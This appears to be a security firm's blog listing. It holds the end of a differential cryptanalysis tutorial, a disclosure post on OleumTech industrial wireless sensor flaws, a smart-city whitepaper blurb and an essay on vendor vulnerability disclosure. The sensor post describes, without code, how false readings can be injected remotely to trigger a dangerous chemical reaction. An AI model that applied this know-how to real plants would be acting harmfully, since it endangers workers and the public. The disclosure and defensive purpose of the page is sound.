The weird behavior of the SBOX under differential mapping is what makes differential cryptanalysis possible, but it this is not to say that this is the ONLY way to perform differential cryptanalysis. The property we are using here (XOR differences) is merely one application of this concept. You should think about differential cryptanalysis as leveraging any operation in an encryption function that can be used to “explain” differences in input/output pairs. So when you’re done reading about this application, look at some of the other common operations in encryption functions and think about what else, besides SBOXs, can be abused in this way; what other properties of the input/outputs pairs have interesting behaviors under common operations?.
Also, it may be useful to think about how you can extend this application of differential cryptanalysis in order to attack multi-round ciphers (i.e. ciphers that are built using multiple rounds of computation of ciphers like the one we’ve attacked here).
Further Reading and References:
Some Scripts to play around with:

RESEARCH | July 2, 2015

Hacking Wireless Ghosts Vulnerable For Years

Is the risk associated to a Remote Code Execution vulnerability in an industrial plant the same when it affects the human life? When calculating risk, certain variables and metrics are combined into equations that are rendered as static numbers, so that risk remediation efforts can be prioritized. But such calculations sometimes ignore the environmental metrics and rely exclusively on exploitability and impact. The practice of scoring vulnerabilities without auditing the potential for collateral damage could underestimate a cyber attack that affects human safety in an industrial plant and leads to catastrophic damage or loss. These deceiving scores are always attractive for attackers since lower-priority security issues are less likely to be resolved on time with a quality remediation.

In the last few years, the world has witnessed advanced cyber attacks against industrial components using complex and expensive malware engineering. Today the lack of entry points for hacking an isolated process inside an industrial plant mean that attacks require a combination of zero-day vulnerabilities and more money.

Two years ago, Carlos Mario Penagos (@binarymantis) and I (Lucas Apa) realized that the most valuable entry point for an attacker is in the air. Radio frequencies leak out of a plant’s perimeter through the high-power antennas that interconnect field devices. Communicating with the target devices from a distance is priceless because it allows an attack to be totally untraceable and frequently unstoppable.

In August 2013 at Black Hat Briefings, we reported multiple vulnerabilities in the industrial wireless products of three vendors and presented our findings. We censored vendor names from our paper to protect the customers who use these products, primarily nuclear, oil and gas, refining, petro-chemical, utility, and wastewater companies mostly based in North America, Latin America, India, and the Middle East (Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and UAE). These companies have trusted expensive but vulnerable wireless sensors to bridge the gap between the physical and digital worlds.

First, we decided to target wireless transmitters (sensors). These sensors gather the physical, real-world values used to monitor conditions, including liquid level, pressure, flow, and temperature. These values are precise enough to be trusted by all of the industrial hardware and machinery in the field. Crucial decisions are based on these numbers. We also targeted wireless gateways, which collect this information and communicate it to the backbone SCADA systems (RTU/EFM/PLC/HMI).

In June 2013, we reported eight different vulnerabilities to the ICS-CERT (Department of Homeland Security). Three months later, one of the vendors, ProSoft Technology released a patch to mitigate a single vulnerability.

After a patient year, IOActive Labs in 2014 released an advisory titled “OleumTech Wireless Sensor Network Vulnerabilities” describing four vulnerabilities that could lead to process compromise, public damage, and employee safety, potentially leading to the loss of life.

Figure 1: OleumTech Transmitters infield

The following OleumTech Products are affected:

  • All OleumTech Wireless Gateways: WIO DH2 and Base Unit (RFv1 Protocol)
  • All OleumTech Transmitters and Wireless Modules (RFv1 Protocol)
  • BreeZ v4.3.1.166

An untrusted user or group within a 40-mile range could inject false values on the wireless gateways in order to modify measurements used to make critical decisions. In the following video demonstration, an attacker makes a chemical react and explode by targeting a wireless transmitter that monitors the process temperature. This was possible because a proper failsafe mechanism had not been implemented and physical controls failed. Heavy machinery makes crucial decisions based on the false readings; this could give the attacker control over part of the process.

Figure 2: OleumTech DH2 used as the primary Wireless Gateway to collect wireless end node data.
Video:  Attack launched using a 40 USD RF transceiver and antenna

Industrial embedded systems’ vulnerabilities that can be exploited remotely without needing any internal access are inherently appealing for terrorists.

Mounting a destructive, real-world attack in these conditions is possible. These products are in commercial use in industrial plants all over the world. As if causing unexpected chemical reactions is not enough, exploiting a remote, wireless memory corruption vulnerability could shut down the sensor network of an entire facility for an undetermined period of time.

In May 2015, two years from the initial private vulnerability disclosure, OleumTech created an updated RF protocol version (RFv2) that seems to allow users to encrypt their wireless traffic with AES256. Firmware for all products was updated to support this new feature.

Still, are OleumTech customers aware of how the new AES Encryption key is generated? Which encryption key is the network using?

Figure 3: Picture from OleumTech BreeZ 5 – Default Values (AES Encryption)

Since every hardware device should be unmounted from the field location for a manual update, what is the cost?

IOActive Labs hasn’t tested these firmware updates. We hope that OleumTech’s technical team performed testing to ensure that the firmware is properly securing radio communications.

I am proud that IOActive has one of the largest professional teams of information security researchers who work with ICS-CERT (DHS) in the world. In addition to identifying critical vulnerabilities and threats for power system facilities, the IOActive team provides security testing directly for control system manufacturers and businesses that have industrial facilities – proactively detecting weaknesses and anticipating exploits in order to improve the safety and operational integrity of technologies.

Needless to say, the companies that rely on vulnerable devices could lose much more than millions of dollars if these vulnerabilities are exploited. These flaws have the potential for massive economic and sociological impact, as well as loss of human life. On the other hand, some attacks are undetectable so it is possible that some of these devices already have been exploited in the wild. We may never know. Fortunately, customers now have a stronger security model and I expect that they now are motivated enough to get involved and ask the vulnerable vendors these open questions.

WHITEPAPER | July 1, 2015

An Emerging US (and World) Threat: Cities Wide Open to Cyber Attacks

Cities around the world are becoming increasingly smart, which creates huge attack surfaces for potential cyber attacks. In this paper, IOActive Labs CTO Cesar Cerrudo provides an overview of current cyber security problems affecting cities as well real threats and possible cyber attacks that could have a huge impact on cities. Cities must take defensive steps now, and Cesar offers recommendations to help them get started. (more…)

INSIGHTS | May 11, 2015

Vulnerability disclosure the good and the ugly

I can’t believe I continue to write about disclosure problems. More than a decade ago, I started disclosing vulnerabilities to vendors and working with them to develop fixes. Since then, I have reported hundreds of vulnerabilities. I often think I have seen everything, and yet, I continue to be surprised over and over again. I wrote a related blog post a year and a half ago (Vulnerability bureaucracy: Unchanged after 12 years), and I will continue to write about disclosure problems until it’s no longer needed.


Everything is becoming digital. Vendors are producing software for the first time or with very little experience, and many have no security knowledge. As a result, insecure software is being deployed worldwide. The Internet of Things (IoT), industrial devices and industrial systems (SCADA/ICS), Smart City technology, automobile systems, and so on are insecure and getting worse instead of better.


Besides lacking of security knowledge, many vendors do not know how to deal with vulnerability reports. They don’t know what to do when an individual researcher or company privately discloses a vulnerability to them, how to properly communicate the problem, or how to fix it. Many vendors haven’t planned for security patches. Basically, they never considered the possibility of a latent security flaw. This creates many of the problems the research community commonly faces.


When IOActive recently disclosed vulnerabilities in CyberLock products, we faced problems, including threats from CyberLock’s lawyers related to the Digital Millennium Copyright Act (DMCA). CyberLock’s response is a very good example of a vendor that does not know how to properly deal with vulnerability reports.


On the other hand, we had a completely different experience when we recently reported vulnerabilities to Lenovo. Lenovo’s response was very professional and collaborative. They even publicly acknowledged our collaboration:


“Lenovo’s development and security teams worked directly with IOActive regarding their System Update vulnerability findings, and we value their expertise in identifying and responsibly reporting them.”

Source: (no longer active)

IOActive approached both cases in the same way, but with two completely different reactions and results.


We always try to contact the affected vendor through a variety of channels and offer our collaboration to ensure a fix is in place before we disclose our research to the public. We invest a lot of time and resources to helping vendors understand the vulnerabilities we find. We have calls with developers and managers, test their fixes, and so on, all for free without expecting anything in return. We do not propose nor discuss business opportunities; our only motive is to see that the vulnerabilities get fixed. We have a great track record; we’ve reported dozens of vulnerabilities and collaborated with many vendors and CERTs too.


When a vendor is nonresponsive, we feel that the best solution is usually to disclose the vulnerability to the public. We do this as a last resort, as no vendor patch or solution will be available in such a case. We do not want to be complicit in hiding a flaw. Letting people know can force the vendor to address the vulnerability.

Dealing with vulnerability reports shouldn’t be this difficult. I’m going to give some advice, based on my experience, to help companies avoid vulnerability disclosure problems and improve the security of their products:


  • Clearly display a contact email for vulnerability reports on the company/product website
  • Continuously monitor that email address and instantly acknowledge when you get a vulnerability report
  • Agree on response procedures including regular timeframes for updating status information after receiving the report
  • Always be collaborative with the researcher/company, even if you don’t like the reporter
  • Always thank the researcher/company for the report, even if you don’t like the reporter
  • Ask the reporter for help if needed, and work together with the reporter to find better solutions
  • Agree on a time for releasing a fix
  • Agree on a time for publicly disclosing the vulnerability
  • Release the fix on time and alert customers

That’s it! Not so difficult. Any company that produces software should follow these simple guidelines at a minimum.

It comes down to this: If you produce software, consider the possibility that your product will have security vulnerabilities and plan accordingly. You will do yourself a big favor, save money, and possibly save your company’s reputation too.